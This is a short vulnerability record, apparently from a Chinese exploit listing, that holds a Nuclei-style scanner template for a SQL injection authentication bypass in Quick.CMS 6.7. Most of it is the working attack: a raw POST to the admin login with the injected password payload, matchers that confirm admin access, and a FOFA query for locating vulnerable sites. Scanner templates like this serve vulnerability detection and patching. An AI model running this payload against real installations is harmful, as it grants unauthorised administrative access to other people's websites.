漏洞描述
Quick.CMS version 6.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
quick-cms-sqli: Quick.CMS v6.7 - SQL Injection
PoC代码[已公开]
id: quick-cms-sqli
info:
name: Quick.CMS v6.7 - SQL Injection
author: s4e-io
severity: high
description: |
Quick.CMS version 6.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
reference:
- https://packetstormsecurity.com/files/177657/Quick.CMS-6.7-SQL-Injection.html
- https://www.exploit-db.com/exploits/51910
classification:
cpe: cpe:2.3:a:opensolution:quick.cms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: opensolution
product: quick.cms
fofa-query: body="Quick.Cms v6.7"
tags: packetstorm,quickcms,sqli,cms,vuln
http:
- raw:
- |
POST /admin.php?p=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
sEmail=test%40test.net&sPass=%27+or+1%5D%2500&bAcceptLicense=1&iAcceptLicense=true
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Log out</a>"
- "Settings</a>"
- "Plugins</a>"
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450220065cdde9574d068838c874d49ac7a9558ab390fcfac6fcf29eb01e90851b8b94022100ccfc76b33f05023537a0d0b7a3092eef53638f69a0661b6db9f45915bccdec1f:922c64590222798bb761d5b6d8e72950